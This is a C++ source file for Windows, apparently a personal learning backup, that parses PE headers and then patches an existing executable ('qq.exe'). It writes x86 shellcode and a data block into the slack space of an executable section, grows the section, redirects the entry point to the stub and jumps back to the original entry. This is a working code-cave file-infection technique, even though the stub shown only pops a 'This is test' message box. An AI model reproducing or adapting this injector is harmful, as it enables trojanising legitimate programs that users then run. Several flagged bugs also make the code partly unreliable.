
#include<Windows.h>
#include<iostream>
#include<fstream>
using namespace std;


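// Checks whether the buffer at ImageBase holds a PE image:
//  1. the first WORD must be IMAGE_DOS_SIGNATURE ("MZ"),
//  2. e_lfanew must be non-negative and, when the buffer size is known,
//     leave room for a full IMAGE_NT_HEADERS inside the buffer,
//  3. the DWORD at e_lfanew must be IMAGE_NT_SIGNATURE ("PE\0\0").
// ImageBase: start of a file mapping or loaded image; NULL yields FALSE.
// ImageSize: byte size of the buffer, or 0 when unknown (existing callers
//            pass nothing). With 0 the range check in step 2 is skipped and
//            the caller must guarantee that e_lfanew + sizeof(IMAGE_NT_HEADERS)
//            bytes are readable, otherwise a crafted e_lfanew reads out of
//            bounds.
// Returns TRUE only when every check passes.
BOOL  IsPeFile(LPVOID  ImageBase, SIZE_T ImageSize = 0)
{
 if (!ImageBase)
  return FALSE;
 if (ImageSize != 0 && ImageSize < sizeof(IMAGE_DOS_HEADER))
  return FALSE;

 const IMAGE_DOS_HEADER *pDosHeader = (const IMAGE_DOS_HEADER *)ImageBase;
 if (pDosHeader->e_magic != IMAGE_DOS_SIGNATURE)
  return FALSE;

 // e_lfanew is a signed LONG; a negative value would point before the buffer.
 const LONG ntOffset = pDosHeader->e_lfanew;
 if (ntOffset < 0)
  return FALSE;
 if (ImageSize != 0 &&
     ((SIZE_T)ntOffset > ImageSize ||
      ImageSize - (SIZE_T)ntOffset < sizeof(IMAGE_NT_HEADERS)))
  return FALSE;

 // ULONG_PTR rather than DWORD: a DWORD cast truncates pointers on 64-bit builds.
 const IMAGE_NT_HEADERS *pNtHeader =
  (const IMAGE_NT_HEADERS *)((ULONG_PTR)pDosHeader + (ULONG_PTR)ntOffset);
 if (pNtHeader->Signature != IMAGE_NT_SIGNATURE)
  return FALSE;
 return TRUE;
}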



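// Returns a pointer to the IMAGE_NT_HEADERS of the PE image at ImageBase
// (ImageBase + e_lfanew), or NULL when IsPeFile rejects the buffer or
// e_lfanew is negative.
// The pointer aliases the caller's buffer and is only valid while that
// mapping/buffer stays alive.
PIMAGE_NT_HEADERS  GetNtHeader(LPVOID  ImageBase)
{
 if (!IsPeFile(ImageBase))
  return NULL;

 const PIMAGE_DOS_HEADER pDosHeader = (PIMAGE_DOS_HEADER)ImageBase;
 // e_lfanew is a signed LONG; refuse to form a pointer before the buffer.
 if (pDosHeader->e_lfanew < 0)
  return NULL;

 // ULONG_PTR, not DWORD: a DWORD cast truncates the pointer on 64-bit builds.
 return (PIMAGE_NT_HEADERS)((ULONG_PTR)pDosHeader + (ULONG_PTR)pDosHeader->e_lfanew);
}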

//以下我们就要获取PE头结构的两个部分 FileHeader与Optionalheader  
// Returns the IMAGE_FILE_HEADER embedded in the NT headers of the image at
// Imagebase, or NULL when GetNtHeader cannot locate valid NT headers.
// WINAPI only fixes the calling convention (__stdcall on x86); it does not
// change what the function does.
PIMAGE_FILE_HEADER  WINAPI  GetFileHeader(LPVOID  Imagebase)
{
 const PIMAGE_NT_HEADERS ntHeaders = GetNtHeader(Imagebase);
 if (ntHeaders == NULL)
  return NULL;
 return &ntHeaders->FileHeader;
}

// Returns the IMAGE_OPTIONAL_HEADER embedded in the NT headers of the image
// at ImageBase, or NULL when GetNtHeader cannot locate valid NT headers.
PIMAGE_OPTIONAL_HEADER  GetOptionalHeader(LPVOID  ImageBase)
{
 const PIMAGE_NT_HEADERS ntHeaders = GetNtHeader(ImageBase);
 if (ntHeaders == NULL)
  return NULL;
 return &ntHeaders->OptionalHeader;
}

//将RVA地址转换为磁盘文件中的偏移
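// Translates a relative virtual address into a raw file offset: finds the
// section whose [VirtualAddress, VirtualAddress + SizeOfRawData) range holds
// Rva and returns Rva - VirtualAddress + PointerToRawData.
// lpMoudle: base of a *file* mapping of the PE (not a loaded image).
// Returns 0 when lpMoudle is not a PE or no section contains Rva. The return
// type is DWORD (previously BOOL, i.e. int) so offsets above 2 GiB are not
// reinterpreted as negative; 0 doubles as the failure value since no real
// section has its raw data at file offset 0.
DWORD RvaToOffset(LPVOID lpMoudle,DWORD Rva)
{
 const PIMAGE_NT_HEADERS pNTHead = GetNtHeader(lpMoudle);
 if (!pNTHead)
  return 0;

 // IMAGE_FIRST_SECTION honours FileHeader.SizeOfOptionalHeader, whereas
 // "+ sizeof(IMAGE_NT_HEADERS)" assumes the optional header has this build's
 // default size (wrong for a non-standard SizeOfOptionalHeader).
 PIMAGE_SECTION_HEADER pSectionHead = IMAGE_FIRST_SECTION(pNTHead);
 const WORD nSectionNum = pNTHead->FileHeader.NumberOfSections;

 for (WORD i = 0; i < nSectionNum; ++i, ++pSectionHead)
 {
  const DWORD sectionStart = pSectionHead->VirtualAddress;
  const DWORD sectionEnd = sectionStart + pSectionHead->SizeOfRawData;
  // A corrupt header can make the end wrap around; skip such sections.
  if (sectionEnd < sectionStart)
   continue;
  if (sectionStart <= Rva && Rva < sectionEnd)
   return Rva - sectionStart + pSectionHead->PointerToRawData;
 }
 return 0;
}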

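// Returns the address inside the file mapping at lpMoudle that corresponds
// to Rva, i.e. lpMoudle + RvaToOffset(lpMoudle, Rva), or 0 when RvaToOffset
// reports failure (returns 0). Previously a failed translation silently
// yielded lpMoudle itself, and the BOOL (32-bit int) return truncated the
// pointer on 64-bit builds; DWORD_PTR keeps the full value.
DWORD_PTR RvaToVirtualAddress(LPVOID lpMoudle,DWORD Rva)
{
 const DWORD offset = RvaToOffset(lpMoudle, Rva);
 if (offset == 0)
  return 0;
 return (DWORD_PTR)lpMoudle + offset;
}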

//看到这里了


// Writes a 72-byte data block followed by a machine-code stub into the slack
// space of the first executable section that has room for both, then points
// AddressOfEntryPoint at the stub; the stub's last four bytes are patched
// with a relative displacement back to the original entry point. An entry
// point landing past a section's original VirtualSize is exactly the
// condition PE-scanning heuristics ("EP in section slack") look for.
//
// file: HANDLE opened with GENERIC_WRITE on the file that `base` maps (main
//       passes hFile / lpMemory). Data and code are written via
//       SetFilePointer/WriteFile on this handle.
// base: FILE_MAP_WRITE view of the same file; the NT headers and the chosen
//       section header are modified through this view. The function assumes
//       the two write paths are coherent and never flushes explicitly.
// Side effects: prints each section name and its slack to stdout; on a
// failed code write shows the system error text in a MessageBox.
// NOTE(review): `base` is not checked for being a PE and `nthead` is not
// checked for NULL before use.
VOID HandleSessionTable(LPVOID file,LPVOID base)
{
 // Four 16-byte fixed-width strings and two DWORDs, written back to back;
 // together they are the datalength (16*4+8 = 72) byte data block.
 char funcname[16]="MessageBoxA";
 char DLLname[16]="user32.dll";
 char Caption[16]="Warning";
 char Content[16]="This is test";
 // Hard-coded constants written after the strings. Nothing in this file
 // establishes what they are; NOTE(review): they look environment-specific,
 // confirm before relying on them. The second one shadows the Win32
 // GetProcAddress API inside this function.
 DWORD LoadLibraryAAddr=0x1f864;
 DWORD GetProcAddress=0x24c46;

 // Raw machine-code bytes copied verbatim into the file (the rest of the
 // file treats the target as PE32). Nothing in them is relocated; only the
 // trailing "\xe9" + four zero bytes (a relative jmp) are patched below.
 char codes[]="\x60\xe8\x0\x0\x0\x0\x5f\x83\xef\x6\x8b\x4f\xf8\x8b"   // these bytes are the code that gets inserted
  "\x5f\xfc\x64\x8b\x15\x30\x0\x0\x0\x8b\x52\xc\x8b\x52\x1c\x8b"   // (binary opcodes, not source)
  "\x12\x8b\x42\x8\x8b\x42\x50\x3\xc8\x50\x8b\xd7\x83\xea\x38\x52"
  "\xff\xd1\x8b\xc8\x58\x3\xd8\x8b\xd7\x83\xea\x48\x52\x51\xff\xd3"
  "\x8b\xcf\x83\xe9\x18\x6a\x0\x51\x83\xe9\x10\x51\x6a\x0\xff\xd0\x61"
  "\xe9\x00\x00\x00\x00";


 int datalength=16*4+8;           // 72 bytes: four 16-byte strings + two DWORDs
 int codeslength=sizeof(codes)-1; // drop the string literal's terminating NUL

 IMAGE_NT_HEADERS *nthead=GetNtHeader(base);
 // First section header follows the NT headers. "+ sizeof(IMAGE_NT_HEADERS)"
 // assumes the default optional-header size (IMAGE_FIRST_SECTION would honour
 // SizeOfOptionalHeader), and the DWORD cast truncates the pointer on 64-bit.
 IMAGE_SECTION_HEADER *sessionhead=(IMAGE_SECTION_HEADER*)((DWORD)nthead+sizeof(IMAGE_NT_HEADERS));
 if(sessionhead->VirtualAddress==NULL)
  return;
 DWORD sessionnum=nthead->FileHeader.NumberOfSections;
 IMAGE_SECTION_HEADER *p=sessionhead;
 // NOTE(review): GetFileSize expects a file HANDLE but is given the mapped
 // view pointer; sFileSize is never read afterwards.
 DWORD sFileSize=GetFileSize(base,NULL);
 for(int i=0;i<sessionnum;i++)
 {
  // Slack = bytes of the section on disk (SizeOfRawData) beyond VirtualSize.
  cout<<(char*)p->Name<<" " <<(int)p->SizeOfRawData-(int)p->Misc.VirtualSize<<endl;
  // NOTE(review): initialising a struct from a pointer (sessionhead is
  // IMAGE_SECTION_HEADER*) does not compile as written; tmp is also never
  // used after the memcpy.
  IMAGE_SECTION_HEADER tmp=sessionhead;
  memcpy(&tmp,p,sizeof(IMAGE_SECTION_HEADER));

  // Candidate section: enough slack for data + code, and marked executable.
  if((int)p->SizeOfRawData-(int)p->Misc.VirtualSize>codeslength+datalength&&\
   (p->Characteristics&IMAGE_SCN_MEM_EXECUTE))

   // (author's marker: read up to here)
  {
   // Data block goes right after the section's used bytes: datavirtualbase
   // is its RVA (unused below), datafileoffect its raw file offset.
   DWORD datavirtualbase=p->VirtualAddress+p->Misc.VirtualSize;
   DWORD datafileoffect=p->PointerToRawData+p->Misc.VirtualSize;
   // None of these calls checks its return value; a failed or short write
   // leaves the file partially modified.
   SetFilePointer(file,datafileoffect,NULL,FILE_BEGIN);
   WriteFile(file,funcname,16,0,0);
   WriteFile(file,DLLname,16,0,0);
   WriteFile(file,Caption,16,0,0);
   WriteFile(file,Content,16,0,0);
   WriteFile(file,&LoadLibraryAAddr,4,0,0);
   WriteFile(file,&GetProcAddress,4,0,0);
   // Code block follows the data block (same RVA/raw-offset pairing).
   DWORD codevirtualbase=p->VirtualAddress+p->Misc.VirtualSize+datalength;
   DWORD cedefileoffset=p->PointerToRawData+p->Misc.VirtualSize+datalength;
   // Grow VirtualSize in the mapped section header so the new bytes fall
   // inside the section's declared size.
   p->Misc.VirtualSize+=(codeslength+datalength);
   SetFilePointer(file,cedefileoffset,NULL,FILE_BEGIN);   // repeated below before the actual write
   DWORD oldentry=nthead->OptionalHeader.AddressOfEntryPoint;
   // rel32 for the trailing 5-byte jmp, which starts at
   // codevirtualbase+codeslength-5: target minus the address after the jmp.
   DWORD JMPOffset=oldentry-(codevirtualbase+codeslength-5)-5;
   memcpy(codes+codeslength-4,&JMPOffset,sizeof(DWORD));
   // Redirect the entry point through the mapped view.
   nthead->OptionalHeader.AddressOfEntryPoint=codevirtualbase;
   DWORD writesize=0;
   SetFilePointer(file,cedefileoffset,NULL,FILE_BEGIN);
   if(!WriteFile(file,codes,codeslength,&writesize,0) )
   {
    // Show the system text for the failed write. The buffer allocated by
    // FORMAT_MESSAGE_ALLOCATE_BUFFER is never LocalFree'd, and mixing TCHAR
    // with the L"ok" literal assumes a UNICODE build.
    TCHAR  *buffer;
    ::FormatMessage(FORMAT_MESSAGE_ALLOCATE_BUFFER | FORMAT_MESSAGE_FROM_SYSTEM,NULL,GetLastError(),0,( LPTSTR )&buffer,0,NULL );
    MessageBox(0,buffer,L"ok",0);
   }
   cout<<"success"<<endl;
   break;   // only the first suitable section is modified

  }

  p++;
 }

}



// Entry point: opens "qq.exe" from the working directory read/write, maps the
// whole file, and if it parses as a PE prints the DataDirectory count and
// hands the handle plus view to HandleSessionTable. Then unmaps, closes the
// handles and waits for a key press.
// NOTE(review): `void main()` is non-standard C++ (the standard requires
// `int main`; MSVC accepts void).
void main()
{


 // NOTE(review): the handle is not compared with INVALID_HANDLE_VALUE; a
 // missing file flows straight into CreateFileMapping.
 HANDLE  hFile = CreateFile(L"qq.exe",           // open  pe file
  GENERIC_READ|GENERIC_WRITE,              // read/write access
  NULL,           // no sharing
  NULL,                      // no security
  OPEN_EXISTING,             // existing file only
  FILE_ATTRIBUTE_NORMAL,   // normal file
  NULL);                     // no attr. template

 HANDLE hFileMap = CreateFileMapping(hFile,NULL,PAGE_READWRITE,0,0,NULL);
 if(!hFileMap )
 {
  // Reports the error but does not return, so MapViewOfFile below runs with
  // a NULL mapping handle. The FormatMessage buffer is never LocalFree'd and
  // the L"ok" literal with TCHAR assumes a UNICODE build.
  TCHAR  *buffer ;



  ::FormatMessage(FORMAT_MESSAGE_ALLOCATE_BUFFER | FORMAT_MESSAGE_FROM_SYSTEM,NULL,GetLastError(),0,( LPTSTR )&buffer,0,NULL );
  MessageBox(0,buffer,L"ok",0);
 }
 // Read/write view of the entire file; lpMemory is not checked for NULL
 // (IsPeFile returns FALSE for NULL, so the "no" branch is taken).
 LPVOID  lpMemory = MapViewOfFile(hFileMap,FILE_MAP_READ|FILE_MAP_WRITE ,NULL,NULL,NULL);


 if(IsPeFile(lpMemory))
 {
  //AnalyzeNTHEADER(lpMemory);
  cout<<"yes"<<endl;
  IMAGE_NT_HEADERS *nthead=GetNtHeader(lpMemory);   // unused after this line
  IMAGE_OPTIONAL_HEADER32 *image=GetOptionalHeader(lpMemory);
  cout<<"DataDirectory num:"<<image->NumberOfRvaAndSizes<<endl;




  // Header edits made through lpMemory are only written back when the view
  // is unmapped below; there is no FlushViewOfFile call.
  HandleSessionTable(hFile,lpMemory);




 }
 else
  cout<<"no"<<endl;

 UnmapViewOfFile(lpMemory);
 CloseHandle(hFileMap);
 CloseHandle(hFile);


 system("pause");
}

以上内容纯属自己用来备份用的

